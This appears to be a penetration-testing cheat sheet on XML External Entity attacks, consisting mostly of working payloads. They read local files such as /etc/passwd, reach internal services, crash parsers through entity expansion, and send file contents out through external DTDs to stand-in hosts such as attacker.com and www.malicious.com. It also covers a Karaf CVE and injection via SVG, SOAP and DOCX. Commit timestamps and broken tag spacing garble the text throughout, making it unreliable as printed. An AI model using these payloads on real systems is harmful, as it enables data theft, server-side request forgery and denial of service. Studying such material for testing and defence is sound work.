2016-10-18 07:06:10 +00:00
# XML External Entity
2018-08-12 21:30:22 +00:00
2018-12-25 11:08:32 +00:00
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity.
Syntax: `<!ENTITY entity_name "entity_value">`
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM` .
Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
## Summary
2018-12-25 14:19:45 +00:00
- [Tools ](#tools )
2019-06-16 21:45:52 +00:00
- [Detect the vulnerability ](#detect-the-vulnerability )
2019-09-08 17:44:51 +00:00
- [Exploiting XXE to retrieve files ](#exploiting-xxe-to-retrieve-files )
- [Classic XXE ](#classic-xxe )
- [Classic XXE Base64 encoded ](#classic-xxe-base64-encoded )
- [PHP Wrapper inside XXE ](#php-wrapper-inside-xxe )
- [XInclude attacks ](#xinclude-attacks )
- [Exploiting XXE to perform SSRF attacks ](#exploiting-xxe-to-perform-SSRF-attacks )
- [Exploiting XXE to perform a deny of service ](#exploiting-xxe-to-perform-a-deny-of-service )
- [Billion Laugh Attack ](#billion-laugh-attack )
- [Error Based XXE ](#error-based-xxe )
- [Exploiting blind XXE to exfiltrate data out-of-band ](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band )
2019-06-16 21:45:52 +00:00
- [Blind XXE ](#blind-xxe )
- [XXE OOB Attack (Yunusov, 2013) ](#xxe-oob-attack-yusonov---2013 )
- [XXE OOB with DTD and PHP filter ](#xxe-oob-with-dtd-and-php-filter )
- [XXE OOB with Apache Karaf ](#xxe-oob-with-apache-karaf )
2018-12-25 11:08:32 +00:00
- [XXE in exotic files ](#xxe-in-exotic-files )
2019-06-16 21:45:52 +00:00
- [XXE inside SVG ](#xxe-inside-svg )
- [XXE inside SOAP ](#xxe-inside-soap )
- [XXE inside DOCX file ](#xxe-inside-docx-file )
2016-10-18 08:01:56 +00:00
2018-12-25 14:19:45 +00:00
## Tools
- [xxeftp ](https://github.com/staaldraad/xxeserv )
```
sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
```
2019-08-06 15:28:47 +00:00
- [230-OOB ](https://github.com/lc/230-OOB ) and payload generation via [http://xxe.sh/ ](http://xxe.sh/ )
```
$ python3 230.py 2121
```
2018-12-25 14:19:45 +00:00
2019-06-16 21:45:52 +00:00
## Detect the vulnerability
2016-10-18 08:01:56 +00:00
2018-12-25 11:08:32 +00:00
Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName` . Entities are defined inside the `DOCTYPE` element.
2018-08-12 21:30:22 +00:00
```xml
2016-10-30 11:53:32 +00:00
<!-- ?xml version="1.0" ? -->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
< userInfo >
< firstName > John< / firstName >
< lastName > &example; < / lastName >
< / userInfo >
```
2018-12-25 11:08:32 +00:00
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
2019-09-08 17:44:51 +00:00
## Exploiting XXE to retrieve files
2018-08-12 21:30:22 +00:00
2019-09-08 17:44:51 +00:00
### Classic XXE
We try to display the content of the file `/etc/passwd`
2018-12-25 11:08:32 +00:00
```xml
<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'> ]>< root > &test; < / root >
```
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
<?xml version="1.0"?>
< !DOCTYPE data [
<!ELEMENT data (#ANY)>
2016-11-03 16:56:15 +00:00
<!ENTITY file SYSTEM "file:///etc/passwd">
2016-10-18 07:06:10 +00:00
]>
< data > &file; < / data >
2016-10-18 08:01:56 +00:00
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>< foo > &xxe; < / foo >
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" > ]>< foo > &xxe; < / foo >
```
2019-06-16 21:45:52 +00:00
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" > ]>< foo > &xxe; < / foo >
```
2019-09-08 17:44:51 +00:00
### Classic XXE Base64 encoded
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]>< foo / >
2016-10-18 07:06:10 +00:00
```
2019-09-08 17:44:51 +00:00
### PHP Wrapper inside XXE
2018-08-12 21:30:22 +00:00
```xml
2016-11-03 16:56:15 +00:00
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
< contacts >
< contact >
< name > Jean &xxe; Dupont< / name >
< phone > 00 11 22 33 44< / phone >
< adress > 42 rue du CTF< / adress >
< zipcode > 75000< / zipcode >
< city > Paris< / city >
< / contact >
2017-06-28 19:43:30 +00:00
< / contacts >
2016-11-03 16:56:15 +00:00
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
2018-11-25 23:25:06 +00:00
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
2017-12-06 19:40:29 +00:00
]>
< foo > &xxe; < / foo >
```
2016-11-03 16:56:15 +00:00
2019-09-08 17:44:51 +00:00
### XInclude attacks
When you can't modify the **DOCTYPE** element use the **XInclude** to target
```xml
< foo xmlns:xi = "http://www.w3.org/2001/XInclude" >
< xi:include parse = "text" href = "file:///etc/passwd" / > < / foo >
```
## Exploiting XXE to perform SSRF attacks
2019-06-16 21:45:52 +00:00
XXE can be combined with the [SSRF vulnerability ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery ) to target another service on the network.
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
2019-09-08 17:44:51 +00:00
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
2019-06-16 21:45:52 +00:00
]>
< foo > &xxe; < / foo >
```
2019-09-08 17:44:51 +00:00
## Exploiting XXE to perform a deny of service
2018-08-12 21:30:22 +00:00
2019-06-16 21:45:52 +00:00
:warning: : These attacks might kill the service or the server, do not use them on the production.
2018-11-25 23:25:06 +00:00
2019-09-08 17:44:51 +00:00
### Billion Laugh Attack
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
< !DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
< data > &a4; < / data >
```
2019-09-08 17:44:51 +00:00
### Yaml attack
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
a: & a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: & b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: & c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: & d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: & e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: & f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: & g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: & h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: & i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
2019-09-08 17:44:51 +00:00
## Error Based XXE
**Payload to trigger the XXE**
```xml
<?xml version="1.0" ?>
< !DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
%ext;
]>
< message > < / message >
```
**Contents of ext.dtd**
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'> ">
%eval;
%error;
```
## Exploiting blind XXE to exfiltrate data out-of-band
2018-08-12 21:30:22 +00:00
2018-11-25 23:25:06 +00:00
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
2018-11-24 14:50:43 +00:00
### Blind XXE
2018-08-12 21:30:22 +00:00
2018-12-25 11:08:32 +00:00
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
```xml
<?xml version="1.0" ?>
< !DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
< r > < / r >
```
2018-11-25 23:25:06 +00:00
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
2018-08-12 21:30:22 +00:00
```xml
2016-11-03 16:56:15 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
< foo > &callhome; < / foo >
```
2018-11-24 14:50:43 +00:00
### XXE OOB Attack (Yunusov, 2013)
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
< data > &send; < / data >
File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'> ">
%all;
```
2018-11-24 14:50:43 +00:00
### XXE OOB with DTD and PHP filter
2018-08-12 21:30:22 +00:00
```xml
2017-06-28 19:43:30 +00:00
<?xml version="1.0" ?>
< !DOCTYPE r [
<!ELEMENT r ANY >
2018-02-23 12:48:51 +00:00
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
2017-06-28 19:43:30 +00:00
%sp;
%param1;
]>
< r > &exfil; < / r >
2018-02-23 12:48:51 +00:00
File stored on http://127.0.0.1/dtd.xml
2017-06-28 19:43:30 +00:00
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
2018-02-23 12:48:51 +00:00
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'> ">
2017-06-28 19:43:30 +00:00
```
2016-10-18 07:06:10 +00:00
2019-06-16 21:45:52 +00:00
### XXE OOB with Apache Karaf
2019-03-23 14:51:16 +00:00
2019-06-16 21:45:52 +00:00
CVE-2018-11788 affecting versions:
2019-03-23 14:51:16 +00:00
- Apache Karaf < = 4.2.1
- Apache Karaf < = 4.1.6
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
< features name = "my-features" xmlns = "http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
< feature name = "deployer" version = "2.0" install = "auto" >
< / feature >
< / features >
```
Send the XML file to the `deploy` folder.
Ref. [brianwrf/CVE-2018-11788 ](https://github.com/brianwrf/CVE-2018-11788 )
2018-12-25 14:19:45 +00:00
2018-12-25 11:08:32 +00:00
## XXE in exotic files
2019-03-23 19:27:12 +00:00
### XXE inside SVG
2019-06-16 21:45:52 +00:00
```xml
2019-03-23 19:27:12 +00:00
< svg xmlns = "http://www.w3.org/2000/svg" xmlns:xlink = "http://www.w3.org/1999/xlink" width = "300" version = "1.1" height = "200" >
< image xlink:href = "expect://ls" > < / image >
< / svg >
```
2019-09-17 14:23:14 +00:00
```
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
< svg width = "128px" height = "128px" xmlns = "http://www.w3.org/2000/svg" xmlns:xlink = "http://www.w3.org/1999/xlink" version = "1.1" >
< text font-size = "16" x = "0" y = "16" > &xxe; < / text >
< / svg >
```
2018-11-25 23:25:06 +00:00
### XXE inside SOAP
2018-08-12 21:30:22 +00:00
```xml
2018-11-25 23:25:06 +00:00
< soap:Body >
< foo >
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
< / foo >
< / soap:Body >
2017-08-07 19:42:14 +00:00
```
2018-11-25 23:25:06 +00:00
### XXE inside DOCX file
2018-11-24 14:50:43 +00:00
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
- /ppt/presentation.xml
- /xl/workbook.xml
Then update the file `zip -u xxe.docx [Content_Types].xml`
Tool : https://github.com/BuffaloWill/oxml_xxe
```xml
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* [XML External Entity (XXE) Processing - OWASP ](https://www.owasp.org/index.php/XML_External_Entity_(XXE )_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka ](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html )
* [staaldraad - XXE payloads ](https://gist.github.com/staaldraad/01415b990939494879b4 )
* [mgeeky - XML attacks ](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870 )
2019-09-08 17:44:51 +00:00
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_ ](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf )
2018-12-25 11:08:32 +00:00
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer) ](http://en.hackdig.com/08/28075.htm )
* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal ](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html )
2018-12-25 15:10:15 +00:00
* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele ](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/ )
* [How we got read access on Google’ s production servers ](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ ) by detectify
* [Blind OOB XXE At UBER 26+ Domains Hacked ](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html ) by Raghav Bisht
* [XXE through SAML ](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf )
* [XXE in Uber to read local files ](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html )
2019-03-23 14:51:16 +00:00
* [XXE by SVG in community.lithium.com ](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/ )
2019-03-23 19:27:12 +00:00
* [XXE inside SVG ](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/ )
2019-08-06 15:28:47 +00:00
* [Pentest XXE - @phonexicum ](https://phonexicum.github.io/infosec/xxe.html )
2019-09-08 17:44:51 +00:00
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018 ](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ )
2019-09-17 14:23:14 +00:00
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd ](https://portswigger.net/web-security/xxe )